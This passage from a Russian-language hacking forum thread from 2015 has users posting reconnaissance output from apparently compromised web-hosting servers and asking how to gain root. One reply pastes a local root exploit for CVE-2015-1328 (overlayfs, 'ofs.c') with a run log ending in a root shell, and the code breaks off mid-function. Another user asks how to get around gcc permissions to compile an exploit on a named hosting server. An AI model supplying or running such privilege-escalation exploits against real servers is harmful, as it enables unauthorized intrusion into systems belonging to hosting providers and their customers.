Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014

$ cat /proc/sys/vm/mmap_min_addr 2>&1

Code:
65536

$ ls -la /usr/bin/staprun 2>&1

Code:
ls: cannot access /usr/bin/staprun: No such file or directory

$ pwd 2>&1

Code:
/opt/www/vhosts/hostname.domain/logs

Expl0ited

01.08.2015, 17:37

d4rk73rr0r said:
↑ (https://antichat.live/posts/3875294/)
Подскажите пожалуйста, можно ли рутить этот сервер?
$ uname -a 2>&1

Code:
Linux zdes byl hostname 3.13.0-40-generic #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

$ ls -la /boot 2>&1

Code:
total 652860
drwxr-xr-x 3 root root 12288 Jun 20 08:15 .
drwxr-xr-x 24 root root 4096 Jun 16 08:07 ..
-rw------- 1 root root 3372643 May 3 2014 System.map-3.13.0-24-generic
-rw------- 1 root root 3378267 Jun 5 2014 System.map-3.13.0-29-generic
-rw------- 1 root root 3378641 Jul 5 2014 System.map-3.13.0-30-generic
-rw------- 1 root root 3381262 Jul 15 2014 System.map-3.13.0-32-generic
-rw------- 1 root root 3381262 Jul 29 2014 System.map-3.13.0-33-generic
-rw------- 1 root root 3381262 Aug 13 2014 System.map-3.13.0-34-generic
-rw------- 1 root root 3386444 Aug 15 2014 System.map-3.13.0-35-generic
-rw------- 1 root root 3386479 Sep 4 2014 System.map-3.13.0-36-generic
-rw------- 1 root root 3386945 Sep 23 2014 System.map-3.13.0-37-generic
-rw------- 1 root root 3386936 Oct 28 2014 System.map-3.13.0-39-generic
-rw------- 1 root root 3387231 Nov 13 2014 System.map-3.13.0-40-generic
-rw------- 1 root root 3388792 Nov 25 2014 System.map-3.13.0-41-generic
-rw------- 1 root root 3388760 Dec 9 2014 System.map-3.13.0-43-generic
-rw------- 1 root root 3388834 Dec 16 2014 System.map-3.13.0-44-generic
-rw------- 1 root root 3389458 Mar 11 01:43 System.map-3.13.0-46-generic
-rw------- 1 root root 3389235 Mar 12 16:52 System.map-3.13.0-48-generic
-rw------- 1 root root 3389437 Apr 11 02:05 System.map-3.13.0-49-generic
-rw------- 1 root root 3389875 Apr 15 18:03 System.map-3.13.0-51-generic
-rw------- 1 root root 3389875 May 4 10:09 System.map-3.13.0-52-generic
-rw------- 1 root root 3390132 May 20 16:11 System.map-3.13.0-53-generic
-rw------- 1 root root 3390881 May 27 01:11 System.map-3.13.0-54-generic
-rw------- 1 root root 3390881 Jun 18 06:03 System.map-3.13.0-55-generic
-rw-r--r-- 1 root root 1158016 May 3 2014 abi-3.13.0-24-generic
-rw-r--r-- 1 root root 1161764 Jun 5 2014 abi-3.13.0-29-generic
-rw-r--r-- 1 root root 1162257 Jul 5 2014 abi-3.13.0-30-generic
-rw-r--r-- 1 root root 1162712 Jul 15 2014 abi-3.13.0-32-generic
-rw-r--r-- 1 root root 1162712 Jul 29 2014 abi-3.13.0-33-generic
-rw-r--r-- 1 root root 1162712 Aug 13 2014 abi-3.13.0-34-generic
-rw-r--r-- 1 root root 1163858 Aug 15 2014 abi-3.13.0-35-generic
-rw-r--r-- 1 root root 1163858 Sep 4 2014 abi-3.13.0-36-generic
-rw-r--r-- 1 root root 1164489 Sep 23 2014 abi-3.13.0-37-generic
-rw-r--r-- 1 root root 1164547 Oct 28 2014 abi-3.13.0-39-generic
-rw-r--r-- 1 root root 1164509 Nov 13 2014 abi-3.13.0-40-generic
-rw-r--r-- 1 root root 1164720 Nov 25 2014 abi-3.13.0-41-generic
-rw-r--r-- 1 root root 1164720 Dec 9 2014 abi-3.13.0-43-generic
-rw-r--r-- 1 root root 1164720 Dec 16 2014 abi-3.13.0-44-generic
-rw-r--r-- 1 root root 1164852 Mar 11 01:43 abi-3.13.0-46-generic
-rw-r--r-- 1 root root 1164723 Mar 12 16:52 abi-3.13.0-48-generic
-rw-r--r-- 1 root root 1164723 Apr 11 02:05 abi-3.13.0-49-generic
-rw-r--r-- 1 root root 1164671 Apr 15 18:03 abi-3.13.0-51-generic
-rw-r--r-- 1 root root 1164671 May 4 10:09 abi-3.13.0-52-generic
-rw-r--r-- 1 root root 1164671 May 20 16:11 abi-3.13.0-53-generic
-rw-r--r-- 1 root root 1164806 May 27 01:11 abi-3.13.0-54-generic
-rw-r--r-- 1 root root 1164806 Jun 18 06:03 abi-3.13.0-55-generic
-rw-r--r-- 1 root root 165510 May 3 2014 config-3.13.0-24-generic
-rw-r--r-- 1 root root 165544 Jun 5 2014 config-3.13.0-29-generic
-rw-r--r-- 1 root root 165576 Jul 5 2014 config-3.13.0-30-generic
-rw-r--r-- 1 root root 165611 Jul 15 2014 config-3.13.0-32-generic
-rw-r--r-- 1 root root 165611 Jul 29 2014 config-3.13.0-33-generic
-rw-r--r-- 1 root root 165611 Aug 13 2014 config-3.13.0-34-generic
-rw-r--r-- 1 root root 165652 Aug 15 2014 config-3.13.0-35-generic
-rw-r--r-- 1 root root 165671 Sep 4 2014 config-3.13.0-36-generic
-rw-r--r-- 1 root root 165712 Sep 23 2014 config-3.13.0-37-generic
-rw-r--r-- 1 root root 165712 Oct 28 2014 config-3.13.0-39-generic
-rw-r--r-- 1 root root 165745 Nov 13 2014 config-3.13.0-40-generic
-rw-r--r-- 1 root root 165745 Nov 25 2014 config-3.13.0-41-generic
-rw-r--r-- 1 root root 165745 Dec 9 2014 config-3.13.0-43-generic
-rw-r--r-- 1 root root 165748 Dec 16 2014 config-3.13.0-44-generic
-rw-r--r-- 1 root root 165748 Mar 11 01:43 config-3.13.0-46-generic
-rw-r--r-- 1 root root 165773 Mar 12 16:52 config-3.13.0-48-generic
-rw-r--r-- 1 root root 165773 Apr 11 02:05 config-3.13.0-49-generic
-rw-r--r-- 1 root root 165762 Apr 15 18:03 config-3.13.0-51-generic
-rw-r--r-- 1 root root 165762 May 4 10:09 config-3.13.0-52-generic
-rw-r--r-- 1 root root 165762 May 20 16:11 config-3.13.0-53-generic
-rw-r--r-- 1 root root 165762 May 27 01:11 config-3.13.0-54-generic
-rw-r--r-- 1 root root 165762 Jun 18 06:03 config-3.13.0-55-generic
drwxr-xr-x 5 root root 4096 Jun 20 08:15 grub
-rw-r--r-- 1 root root 19692919 Jun 25 2014 initrd.img-3.13.0-24-generic
-rw-r--r-- 1 root root 19693496 Jun 25 2014 initrd.img-3.13.0-29-generic
-rw-r--r-- 1 root root 19802843 Jul 10 2014 initrd.img-3.13.0-30-generic
-rw-r--r-- 1 root root 19805892 Jul 30 2014 initrd.img-3.13.0-32-generic
-rw-r--r-- 1 root root 19806330 Aug 12 2014 initrd.img-3.13.0-33-generic
-rw-r--r-- 1 root root 19807084 Aug 14 2014 initrd.img-3.13.0-34-generic
-rw-r--r-- 1 root root 19814700 Aug 29 2014 initrd.img-3.13.0-35-generic
-rw-r--r-- 1 root root 19827146 Sep 23 2014 initrd.img-3.13.0-36-generic
-rw-r--r-- 1 root root 19826914 Oct 9 2014 initrd.img-3.13.0-37-generic
-rw-r--r-- 1 root root 19826798 Oct 30 2014 initrd.img-3.13.0-39-generic
-rw-r--r-- 1 root root 19831562 Nov 25 2014 initrd.img-3.13.0-40-generic
-rw-r--r-- 1 root root 19857194 Dec 11 2014 initrd.img-3.13.0-41-generic
-rw-r--r-- 1 root root 19858798 Dec 12 2014 initrd.img-3.13.0-43-generic
-rw-r--r-- 1 root root 19860064 Jan 13 2015 initrd.img-3.13.0-44-generic
-rw-r--r-- 1 root root 19863695 Mar 12 07:53 initrd.img-3.13.0-46-generic
-rw-r--r-- 1 root root 19862856 Mar 24 07:52 initrd.img-3.13.0-48-generic
-rw-r--r-- 1 root root 19864189 Apr 14 08:09 initrd.img-3.13.0-49-generic
-rw-r--r-- 1 root root 19862129 Apr 30 08:11 initrd.img-3.13.0-51-generic
-rw-r--r-- 1 root root 19865264 May 7 08:07 initrd.img-3.13.0-52-generic
-rw-r--r-- 1 root root 19864608 May 22 08:48 initrd.img-3.13.0-53-generic
-rw-r--r-- 1 root root 19864503 Jun 11 08:24 initrd.img-3.13.0-54-generic
-rw-r--r-- 1 root root 19863440 Jun 20 08:15 initrd.img-3.13.0-55-generic
-rw-r--r-- 1 root root 176500 Mar 12 2014 memtest86+.bin
-rw-r--r-- 1 root root 178176 Mar 12 2014 memtest86+.elf
-rw-r--r-- 1 root root 178680 Mar 12 2014 memtest86+_multiboot.bin
-rw------- 1 root root 5776416 May 3 2014 vmlinuz-3.13.0-24-generic
-rw------- 1 root root 5792544 Jun 5 2014 vmlinuz-3.13.0-29-generic
-rw------- 1 root root 5792608 Jul 5 2014 vmlinuz-3.13.0-30-generic
-rw------- 1 root root 5798112 Jul 15 2014 vmlinuz-3.13.0-32-generic
-rw------- 1 root root 5798688 Jul 29 2014 vmlinuz-3.13.0-33-generic
-rw------- 1 root root 5797728 Aug 13 2014 vmlinuz-3.13.0-34-generic
-rw------- 1 root root 5806368 Aug 15 2014 vmlinuz-3.13.0-35-generic
-rw------- 1 root root 5806848 Sep 4 2014 vmlinuz-3.13.0-36-generic
-rw------- 1 root root 5808832 Sep 23 2014 vmlinuz-3.13.0-37-generic
-rw------- 1 root root 5808544 Oct 28 2014 vmlinuz-3.13.0-39-generic
-rw------- 1 root root 5808960 Nov 13 2014 vmlinuz-3.13.0-40-generic
-rw------- 1 root root 5814112 Nov 25 2014 vmlinuz-3.13.0-41-generic
-rw------- 1 root root 5814080 Dec 9 2014 vmlinuz-3.13.0-43-generic
-rw------- 1 root root 5814496 Dec 16 2014 vmlinuz-3.13.0-44-generic
-rw------- 1 root root 5814592 Mar 11 01:43 vmlinuz-3.13.0-46-generic
-rw------- 1 root root 5815680 Mar 12 16:52 vmlinuz-3.13.0-48-generic
-rw------- 1 root root 5815392 Apr 11 02:05 vmlinuz-3.13.0-49-generic
-rw------- 1 root root 5818368 Apr 15 18:03 vmlinuz-3.13.0-51-generic
-rw------- 1 root root 5818592 May 4 10:09 vmlinuz-3.13.0-52-generic
-rw------- 1 root root 5821152 May 20 16:11 vmlinuz-3.13.0-53-generic
-rw------- 1 root root 5821664 May 27 01:11 vmlinuz-3.13.0-54-generic
-rw------- 1 root root 5821984 Jun 18 06:03 vmlinuz-3.13.0-55-generic

ls -la --full-time /lib 2>&1

Code:
total 312
drwxr-xr-x 23 root root 4096 2015-02-27 08:01:04.121244740 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
drwxr-xr-x 2 root root 4096 2014-11-21 07:40:33.676606953 +0500 apparmor
lrwxrwxrwx 1 root root 21 2014-07-11 16:04:40.744028161 +0500 cpp -> /etc/alternatives/cpp
drwxr-xr-x 3 root root 4096 2014-06-24 11:04:14.153311413 +0500 crda
drwxr-xr-x 81 root root 20480 2015-06-16 08:07:19.308506965 +0500 firmware
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:09.613305094 +0500 hdparm
drwxr-xr-x 2 root root 12288 2015-02-27 08:01:04.121244740 +0500 i386-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:14.108394221 +0500 ifupdown
drwxr-xr-x 2 root root 4096 2014-07-30 11:27:25.309402444 +0500 init
-rwxr-xr-x 1 root root 71512 2013-12-24 07:51:15.000000000 +0500 klibc-P2s_k-gf23VtrGgO2_4pGkQgwMY.so
lrwxrwxrwx 1 root root 25 2015-02-25 21:58:43.000000000 +0500 ld-linux.so.2 -> i386-linux-gnu/ld-2.19.so
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip4tc.so.0 -> libip4tc.so.0.1.0
-rw-r--r-- 1 root root 27392 2014-01-09 03:32:05.000000000 +0500 libip4tc.so.0.1.0
lrwxrwxrwx 1 root root 17 2014-01-09 03:32:00.000000000 +0500 libip6tc.so.0 -> libip6tc.so.0.1.0
-rw-r--r-- 1 root root 31520 2014-01-09 03:32:05.000000000 +0500 libip6tc.so.0.1.0
lrwxrwxrwx 1 root root 16 2014-01-09 03:32:00.000000000 +0500 libiptc.so.0 -> libiptc.so.0.0.0
-rw-r--r-- 1 root root 5816 2014-01-09 03:32:05.000000000 +0500 libiptc.so.0.0.0
lrwxrwxrwx 1 root root 20 2014-01-09 03:32:00.000000000 +0500 libxtables.so.10 -> libxtables.so.10.0.0
-rw-r--r-- 1 root root 47712 2014-01-09 03:32:06.000000000 +0500 libxtables.so.10.0.0
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 lsb
drwxr-xr-x 2 root root 4096 2015-06-20 08:14:04.183221689 +0500 modprobe.d
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:17.752507007 +0500 modules
drwxr-xr-x 2 root root 4096 2015-05-22 08:46:32.470408887 +0500 modules-load.d
drwxr-xr-x 3 root root 4096 2014-06-24 11:03:45.029312194 +0500 plymouth
drwxr-xr-x 3 root root 4096 2014-06-24 11:10:30.041301325 +0500 recovery-mode
drwxr-xr-x 2 root root 4096 2014-06-27 11:51:03.188394514 +0500 resolvconf
drwxr-xr-x 2 root root 4096 2014-07-11 15:54:31.320044515 +0500 security
drwxr-xr-x 3 root root 4096 2014-07-10 17:19:11.242226794 +0500 systemd
drwxr-xr-x 15 root root 4096 2014-06-24 11:03:45.029312194 +0500 terminfo
drwxr-xr-x 4 root root 4096 2014-07-11 15:54:50.304044005 +0500 udev
drwxr-xr-x 2 root root 4096 2014-06-24 11:12:34.149297995 +0500 ufw
drwxr-xr-x 4 root root 12288 2015-06-12 08:11:58.733773878 +0500 x86_64-linux-gnu
drwxr-xr-x 2 root root 4096 2014-06-24 11:08:13.173304998 +0500 xtables

ls -la --full-time /lib64 2>&1

Code:
total 8
drwxr-xr-x 2 root root 4096 2015-02-27 08:01:05.833244694 +0500 .
drwxr-xr-x 24 root root 4096 2015-06-16 08:07:45.004506276 +0500 ..
lrwxrwxrwx 1 root root 32 2015-02-25 21:56:31.000000000 +0500 ld-linux-x86-64.so.2 -> /lib/x86_64-linux-gnu/ld-2.19.so

$ mount 2>&1

Code:
/dev/md0 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/md1 on /opt type ext4 (rw,usrquota)
systemd on /sys/fs/cgroup/systemd type cgroup (rw,noexec,nosuid,nodev,none,name=systemd)

$ df -h 2>&1

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/md0 459G 215G 221G 50% /
none 4.0K 0 4.0K 0% /sys/fs/cgroup
udev 3.8G 4.0K 3.8G 1% /dev
tmpfs 768M 1.8M 767M 1% /run
none 5.0M 0 5.0M 0% /run/lock
none 3.8G 16K 3.8G 1% /run/shm
none 100M 0 100M 0% /run/user
/dev/md1 1.8T 48G 1.7T 3% /opt

$ cat /etc/issue 2>&1

Code:
Ubuntu 14.04.1 LTS \n \l

$ cat /etc/crontab 2>&1

Code:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

# ClamAV refresh virus databases
30 1 * * * root freshclam >/dev/null 2>&1

# ClamAV checking vhosts directory and sending email to admins
0 2 * * * root /adm/clamav.sh >/dev/null 2>&1

$ ls -la /etc/cron.d 2>&1

Code:
total 44
drwxr-xr-x 2 root root 4096 Apr 21 08:16 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rw------- 1 root root 260 Jul 11 2014 awstats
-rw-r--r-- 1 root root 1566 Feb 3 2014 mailman
-rw-r--r-- 1 root root 589 Feb 28 2014 mdadm
-rw-r--r-- 1 root root 510 Jul 7 2014 php5
-rw-r--r-- 1 root root 110 Jul 11 2014 plesk-backup-manager-task
-rw-r--r-- 1 root root 156 Aug 7 2014 plesk-outgoing-mail-statistics-poller

$ ls -la /etc/cron.hourly 2>&1

Code:
total 20
drwxr-xr-x 2 root root 4096 Jun 24 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder

$ ls -la /etc/cron.monthly 2>&1

Code:
total 24
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 190 Jun 25 2014 50plesk-monthly

$ ls -la /etc/cron.weekly 2>&1

Code:
total 40
drwxr-xr-x 2 root root 4096 Jul 11 2014 .
drwxr-xr-x 144 root root 12288 Jul 31 17:59 ..
-rw-r--r-- 1 root root 102 Feb 9 2013 .placeholder
-rwxr-xr-x 1 root root 189 Jun 25 2014 50plesk-weekly
-rwxr-xr-x 1 root root 730 Feb 23 2014 apt-xapian-index
-rwxr-xr-x 1 root root 427 Apr 16 2014 fstrim
-rwxr-xr-x 1 root root 771 Apr 10 2014 man-db
-rwxr-xr-x 1 root root 211 Apr 10 2014 update-notifier-common

$ cat /proc/version 2>&1

Code:
Linux version 3.13.0-40-generic (buildd@comet) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #69-Ubuntu SMP Thu Nov 13 17:53:56 UTC 2014

$ cat /proc/sys/vm/mmap_min_addr 2>&1

Code:
65536

$ ls -la /usr/bin/staprun 2>&1

Code:
ls: cannot access /usr/bin/staprun: No such file or directory

$ pwd 2>&1

Code:
/opt/www/vhosts/hostname.domain/logs

[CODE]
Code:
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000( user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= *=*=*=*=*=*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);

fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";

chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");

chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}

chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;

fprintf(stderr,"spawning threads\n");

if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");

if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid

powerOfthemind

13.08.2015, 17:22

uname -a

Code:
Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
686 i686 i386 GNU/Linux

ls -la /boot

Code:
total 39154
drwxr-xr-x 5 root root 5120 Apr 8 13:07 .
drwxr-xr-x 28 root root 4096 Aug 10 03:00 ..
-rw-r--r-- 1 root root 163 Jan 6 2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac
-rw-r--r-- 1 root root 166 Sep 26 2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
c
-rw-r--r-- 1 root root 165 Dec 5 2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac

-rw-r--r-- 1 root root 165 Jun 11 2014 .vmlinuz-2.6.18-371.9.1.el5PAE.hmac

-rw-r--r-- 1 root root 161 Sep 17 2014 .vmlinuz-2.6.18-398.el5PAE.hmac
-rw-r--r-- 1 root root 161 Apr 7 20:53 .vmlinuz-2.6.18-404.el5PAE.hmac
-rw-r--r-- 1 root root 971511 Jan 6 2011 System.map-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 967675 Apr 2 2010 System.map-2.6.18-194.el5
-rw-r--r-- 1 root root 993118 Sep 26 2013 System.map-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 993780 Dec 5 2013 System.map-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 993835 Jun 11 2014 System.map-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 993998 Sep 17 2014 System.map-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 994152 Apr 7 20:53 System.map-2.6.18-404.el5PAE
-rw-r--r-- 1 root root 69598 Jan 6 2011 config-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 69593 Apr 2 2010 config-2.6.18-194.el5
-rw-r--r-- 1 root root 70337 Sep 26 2013 config-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 70357 Dec 5 2013 config-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 70357 Jun 11 2014 config-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 70353 Sep 17 2014 config-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 70353 Apr 7 20:53 config-2.6.18-404.el5PAE
drwxr-xr-x 2 root root 1024 May 4 2010 extlinux
drwxr-xr-x 2 root root 1024 Apr 8 13:07 grub
-rw------- 1 root root 2599913 Jan 25 2011 initrd-2.6.18-194.32.1.el5.img
-rw------- 1 root root 2569559 Jan 25 2011 initrd-2.6.18-194.el5.img
-rw------- 1 root root 2615526 Oct 14 2013 initrd-2.6.18-348.18.1.el5PAE.img
-rw------- 1 root root 2615834 Jan 24 2014 initrd-2.6.18-371.3.1.el5PAE.img
-rw------- 1 root root 2616679 Jun 12 2014 initrd-2.6.18-371.9.1.el5PAE.img
-rw------- 1 root root 2616919 Dec 2 2014 initrd-2.6.18-398.el5PAE.img
-rw------- 1 root root 2616967 Apr 8 13:07 initrd-2.6.18-404.el5PAE.img
drwx------ 2 root root 12288 Jan 1 2009 lost+found
-rw-r--r-- 1 root root 80032 Mar 12 2009 message
-rw-r--r-- 1 root root 111346 Jan 6 2011 symvers-2.6.18-194.32.1.el5.gz
-rw-r--r-- 1 root root 110979 Apr 2 2010 symvers-2.6.18-194.el5.gz
-rw-r--r-- 1 root root 117369 Sep 26 2013 symvers-2.6.18-348.18.1.el5PAE.gz
-rw-r--r-- 1 root root 117471 Dec 5 2013 symvers-2.6.18-371.3.1.el5PAE.gz
-rw-r--r-- 1 root root 117487 Jun 11 2014 symvers-2.6.18-371.9.1.el5PAE.gz
-rw-r--r-- 1 root root 117549 Sep 17 2014 symvers-2.6.18-398.el5PAE.gz
-rw-r--r-- 1 root root 117561 Apr 7 20:53 symvers-2.6.18-404.el5PAE.gz
-rw-r--r-- 1 root root 1877108 Jan 6 2011 vmlinuz-2.6.18-194.32.1.el5
-rw-r--r-- 1 root root 1875796 Apr 2 2010 vmlinuz-2.6.18-194.el5
-rw-r--r-- 1 root root 1908212 Sep 26 2013 vmlinuz-2.6.18-348.18.1.el5PAE
-rw-r--r-- 1 root root 1909108 Dec 5 2013 vmlinuz-2.6.18-371.3.1.el5PAE
-rw-r--r-- 1 root root 1909140 Jun 11 2014 vmlinuz-2.6.18-371.9.1.el5PAE
-rw-r--r-- 1 root root 1910164 Sep 17 2014 vmlinuz-2.6.18-398.el5PAE
-rw-r--r-- 1 root root 1910324 Apr 7 20:53 vmlinuz-2.6.18-404.el5PAE

mount

Code:
/dev/md3 on / type ext3 (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/md4 on /tmp type ext3 (rw,noexec,nosuid,nodev,noatime)
/dev/md2 on /boot type ext3 (rw)
/dev/md1 on /var type ext3 (rw,noatime)
/dev/md0 on /hsphere type ext3 (rw,noatime,usrquota,data=writeback)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

df -h

Code:
Filesystem Size Used Avail Use% Mounted on
/dev/md3 15G 6.8G 7.1G 49% /
/dev/md4 4.9G 2.6G 2.1G 56% /tmp
/dev/md2 198M 46M 143M 25% /boot
/dev/md1 436G 21G 393G 6% /var
/dev/md0 417G 135G 260G 35% /hsphere
tmpfs 5.9G 0 5.9G 0% /dev/shm

cat /etc/issue

Code:
CentOS release 5.5 (Final
Kernel \r on an \m

cat /proc/version

Code:
Linux version 2.6.18-371.3.1.el5PAE (mockbuild@builder10.centos.org) (gcc versio
n 4.1.2 20080704 (Red Hat 4.1.2-54)) #1 SMP Thu Dec 5 13:29:20 EST 2013

cat /proc/sys/vm/mmap_min_addr

4096

Использую этот эксполит https://www.exploit-db.com/exploits/10613/

Но при его копиляции пишет что недостаточно прав gcc, можно это обойти ?gcc установлены права 750

И вопрос ,я правельный экполит выбрал?? Ешё только учусь.

YaBtr

13.08.2015, 18:41

powerOfthemind said:
↑ (https://antichat.live/posts/3879671/)
uname -a

Code:
Linux vh16.hosting.ua 2.6.18-371.3.1.el5PAE #1 SMP Thu Dec 5 13:29:20 EST 2013 i
686 i686 i386 GNU/Linux

ls -la /boot

Code:
total 39154
drwxr-xr-x 5 root root 5120 Apr 8 13:07 .
drwxr-xr-x 28 root root 4096 Aug 10 03:00 ..
-rw-r--r-- 1 root root 163 Jan 6 2011 .vmlinuz-2.6.18-194.32.1.el5.hmac
-rw-r--r-- 1 root root 158 Apr 2 2010 .vmlinuz-2.6.18-194.el5.hmac
-rw-r--r-- 1 root root 166 Sep 26 2013 .vmlinuz-2.6.18-348.18.1.el5PAE.hma
c
-rw-r--r-- 1 root root 165 Dec 5 2013 .vmlinuz-2.6.18-371.3.1.el5PAE.hmac

